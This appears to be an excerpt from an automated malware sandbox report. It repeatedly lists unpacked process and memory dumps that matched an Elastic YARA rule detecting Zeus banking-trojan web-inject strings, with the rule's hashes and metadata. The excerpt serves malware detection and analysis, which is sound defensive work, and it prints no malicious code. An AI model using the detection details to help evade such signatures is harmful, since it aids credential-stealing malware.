    Source: 25.2.cUKxeliGgCix.exe.892000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.24.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 8.2.cUKxeliGgCix.exe.25c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 33.2.cUKxeliGgCix.exe.32f0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 5.2.cUKxeliGgCix.exe.2f60000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 27.2.cUKxeliGgCix.exe.14f2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 21.2.cUKxeliGgCix.exe.24b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 37.2.cUKxeliGgCix.exe.3140000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.17.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.17.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.2.5AFlyarMds.exe.407000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.2.svchost.exe.2cf3c00.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 19.2.cUKxeliGgCix.exe.2542000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.21.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.22.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.88d400.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.2.5AFlyarMds.exe.406400.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 39.2.cUKxeliGgCix.exe.2be0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.41.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 19.2.cUKxeliGgCix.exe.2910000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.3.5AFlyarMds.exe.704510.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.3.5AFlyarMds.exe.705110.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 21.2.cUKxeliGgCix.exe.24b0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.2.svchost.exe.2cf3c00.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 8.2.cUKxeliGgCix.exe.25c0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 35.2.cUKxeliGgCix.exe.2062000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.39.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 23.2.cUKxeliGgCix.exe.2e42000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 25.2.cUKxeliGgCix.exe.8f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.19.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 8.2.cUKxeliGgCix.exe.2522000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 6.2.cUKxeliGgCix.exe.23f2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 5.2.cUKxeliGgCix.exe.15e2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.19.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 5.2.cUKxeliGgCix.exe.15e2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.34.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
